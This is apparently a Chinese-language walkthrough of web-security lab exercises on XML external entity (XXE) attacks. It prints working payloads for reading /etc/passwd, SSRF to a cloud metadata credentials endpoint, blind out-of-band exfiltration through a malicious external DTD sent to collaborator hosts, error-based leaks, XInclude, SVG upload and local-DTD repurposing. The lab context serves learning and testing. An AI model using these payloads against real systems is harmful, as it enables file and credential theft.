使用外部实体利用 XXE 来检索文件
data:image/s3,"s3://crabby-images/7dcfd/7dcfd513d602caa974fed518262b225e110ff619" alt="image-20221207105545498"
data:image/s3,"s3://crabby-images/630ed/630ed4d67b387bc8b948f66699824f27beacd71d" alt="image-20221207105635585"
这里发现一个 xml请求 简单测试下发现存在xxe
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE xxe [ <!ENTITY xxe SYSTEM "file:///etc/passwd">]> <stockCheck> <productId>&xxe;</productId> <storeId>2</storeId> </stockCheck>
|
data:image/s3,"s3://crabby-images/47b75/47b75da896e538daaf2a28f49473a5aca417cad8" alt="image-20221207114318110"
data:image/s3,"s3://crabby-images/b0606/b06069c737094f0bc83e83aa73e7303441b9d8e1" alt="image-20221207114356508"
利用 XXE 执行 SSRF 攻击
data:image/s3,"s3://crabby-images/3a59c/3a59cd92e519b19cc5cf9de0d30ac5e43a661357" alt="image-20221207114605824"
跟上一关类似 只不过更换了协议
data:image/s3,"s3://crabby-images/e50e1/e50e1a867f753c83440be5e3c0f9db9e82c5e8c2" alt="image-20221207115100609"
data:image/s3,"s3://crabby-images/31b5f/31b5f673ac4c958bc4dd621f44184fe2ec0c2e50" alt="image-20221207115115548"
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE xxe [ <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/admin">]> <stockCheck> <productId>&xxe;</productId> <storeId>1</storeId> </stockCheck>
|
data:image/s3,"s3://crabby-images/dda71/dda712470f8e305371100d4c5290fabe598caf37" alt="image-20221207115205075"
data:image/s3,"s3://crabby-images/83481/834814d67ed34ff5bdbb67fe75fae91b1942c474" alt="image-20221207115329356"
带外交互的盲 XXE
data:image/s3,"s3://crabby-images/2a776/2a776d3614deb8f1649738c4ca765bc16b556f17" alt="image-20221207115834303"
data:image/s3,"s3://crabby-images/e9e30/e9e30fa4102051bb260a3f9ff50c01c306cce813" alt="image-20221207120150364"
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE xxe [ <!ENTITY xxe SYSTEM "http://ap33r37p2no79dvuxo4aqtg8azgp4e.burpcollaborator.net">]> <stockCheck> <productId>&xxe;</productId> <storeId>2</storeId> </stockCheck>
|
data:image/s3,"s3://crabby-images/60678/606780b916d846a86691ccad83010cb21dc8a659" alt="image-20221207120156639"
通过 XML 参数实体进行带外交互的盲 XXE
data:image/s3,"s3://crabby-images/b382c/b382cb53df5c58b83925c357b4a0b384cf2b1d9a" alt="image-20221207123050791"
当使用上一关的 payload时 出现不被允许的实体 也就是说外部实体是不被允许的 我们来尝试参数实体
xml实体的概念
https://blog.csdn.net/janchin/article/details/46849209
data:image/s3,"s3://crabby-images/e575c/e575c1528d8edd3aebfb67934a76e37f96bcd51d" alt="image-20221207123035446"
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE test [ <!ENTITY % xxe SYSTEM "http://zorino0qqxsyrp9vlnkm080bk2qvek.burpcollaborator.net"> %xxe;]> <stockCheck> <productId>1</productId> <storeId>2</storeId> </stockCheck>
|
data:image/s3,"s3://crabby-images/2b0d9/2b0d9fe07f0a1f77dbc291bf9f7c5475609ff051" alt="image-20221207123458033"
data:image/s3,"s3://crabby-images/86f22/86f22cda9fe4555fb7c9b8f1bf81107a32f5f7c2" alt="image-20221207123519631"
利用盲 XXE 使用恶意外部 DTD 泄露数据
data:image/s3,"s3://crabby-images/d16bf/d16bfea6212856b5014f379398745d64b1f1060e" alt="image-20221207132213538"
放到攻击者主机并命名为 exploit.dtd
<!ENTITY % file SYSTEM "file:///etc/hostname"> <!ENTITY % eval "<!ENTITY % exfil SYSTEM 'http://jf22e8rahhjii90fc7b6rsrvbmhg55.burpcollaborator.net/?x=%file;'>">
|
data:image/s3,"s3://crabby-images/64397/6439731c7b55b35bdfc9633c3c854f452ac27b8e" alt="image-20221207132653504"
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE test [<!ENTITY % xxe SYSTEM "https://exploit-0a0b00ac03cd6d6ac12e101d011f00e2.exploit-server.net/exploit.dtd"> %xxe;%eval;%exfil;]> <stockCheck> <productId>1</productId> <storeId>2</storeId> </stockCheck>
|
简单解释一下 这里存在一个外部引用的 dtd文件 首先我们通过 %xxe; 获取到这个dtd文件并插入到适当的位置 接着引用%eval 去构造请求信息 首先通过%file 获取到了敏感文件 后拼接到url上面 接着执行%exfil 携带着 敏感文件去执行url请求
data:image/s3,"s3://crabby-images/90dfd/90dfd13af6cf025f2444df2fca05f414767f2ea6" alt="image-20221207133424962"
data:image/s3,"s3://crabby-images/1f5b2/1f5b2ce54378cd0f5624c923fc11b9fcde175fdf" alt="image-20221207133443920"
data:image/s3,"s3://crabby-images/67f9f/67f9fec3ab0c50d0c4dafc068690d25fc80a1454" alt="image-20221207133453614"
利用盲 XXE 通过错误消息检索数据
data:image/s3,"s3://crabby-images/79ee8/79ee8e503fe761d6db9ddc888d45811e3598f8ae" alt="image-20221207140802468"
这里需要通过xml解析报错回显信息
<!ENTITY % file SYSTEM "file:///etc/passwd"> <!ENTITY % eval "<!ENTITY % exfil SYSTEM 'file:///invalid/%file;'>">
|
可见这里使用了外部dtd文件.其中的主要原因是 外部dtd允许我们在第二个实体中包含一个实体,但是他在内部dtd中被禁止
data:image/s3,"s3://crabby-images/f823c/f823cf4960ad3fff2435e97c615e5e9f5330dc81" alt="image-20221207150359075"
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE foo [<!ENTITY % xxe SYSTEM "https://exploit-0af800c904796803c0857c8c01b600c3.exploit-server.net/exploit.dtd"> %xxe;%eval;%exfil;]> <stockCheck> <productId>1</productId> <storeId>2</storeId> </stockCheck>
|
data:image/s3,"s3://crabby-images/cd130/cd1302e4287c0ceda3cd894496f401893407905e" alt="image-20221207150928396"
data:image/s3,"s3://crabby-images/e7f15/e7f15a2ab7a7522e14eeebf974dc1c9d1fc7d1f8" alt="image-20221207150935088"
利用 XInclude 检索文件
data:image/s3,"s3://crabby-images/6094c/6094c7ce7b9b26135884495b226d254a6dcc2d4d" alt="image-20221207154342139"
这里使用xinclude包含文件
<foo xmlns:xi="http://www.w3.org/2001/XInclude"> <xi:include parse="text" href="file:///etc/passwd"/> </foo>
|
data:image/s3,"s3://crabby-images/a52ce/a52ce4cc25d45dced85526020555e06acaa8d7f7" alt="image-20221207154546084"
data:image/s3,"s3://crabby-images/0c1dd/0c1dd39d9d8d4dc96de2342eda5c594a2a626ec3" alt="image-20221207154604888"
通过图像文件上传利用 XXE
data:image/s3,"s3://crabby-images/88706/88706c0807f57db14539937805c289ad5653f5d8" alt="image-20221207161318218"
从原文中下载下来一个svg标签发现是xml文件格式
data:image/s3,"s3://crabby-images/0396e/0396e9a936f710f424f1d197c02a0bd6f63efdeb" alt="image-20221207161311946"
我们这里尝试上传一个xml文件
<?xml version="1.0" standalone="yes"?> <!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]> <svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" version="1.1"> <text font-size="16" x="0" y="16">&xxe;</text> </svg>
|
data:image/s3,"s3://crabby-images/5d97b/5d97bdffc6e571cf7480df5bd32545bd428d00fd" alt="image-20221207162101592"
data:image/s3,"s3://crabby-images/32173/32173ebd58128781f3dfefa4d2d9ec48d0cd4157" alt="image-20221207162159961"
data:image/s3,"s3://crabby-images/d626f/d626f2d0a3319bf56ee365437756faed3244e5ad" alt="image-20221207162219415"
通过重新利用本地 DTD,利用 XXE 检索数据
data:image/s3,"s3://crabby-images/e6a4c/e6a4ca7239ba5e7975802eea475e5ce37b60c023" alt="image-20221207171032514"
由第6关的思路我们可以通过外链 dtd文件去包含 我们的实体代码. 但是本关不能访问外链,因此我们需要利用系统内部的dtd文件去构造类似的请求
<?xml version="1.0" ?> <!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///opt/IBM/WebSphere/AppServer/properties/sip-app_1_0.dtd"> <!ENTITY % condition 'aaa)> <!ENTITY % file SYSTEM "file:///etc/passwd"> <!ENTITY % eval "<!ENTITY % error SYSTEM 'file:///nonexistent/%file;'>"> %eval; %error; <!ELEMENT aa (bb'> %local_dtd; ]> <message>any text</message>
|
sip-app_1_0.dtd 中的内容
… <!ENTITY % condition "and | or | not | equal | contains | exists | subdomain-of"> <!ELEMENT pattern (%condition;)> …
|
可以看到 首先我们通过引用condition 将我们外面的文件内容添加到了 sip-app_1_0.dtd 之中,也就可以使用 内部实体
data:image/s3,"s3://crabby-images/7de1d/7de1d279520f2975200111f614b2b980b6ca8822" alt="image-20221207175744179"
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd"> <!ENTITY % ISOamso ' <!ENTITY % file SYSTEM "file:///etc/passwd"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>"> %eval; %error; '> %local_dtd; ]> <stockCheck><productId>2</productId><storeId>1</storeId></stockCheck>
|
data:image/s3,"s3://crabby-images/2f700/2f70005016160614776f5e58acc1f427c5dde152" alt="image-20221207180451242"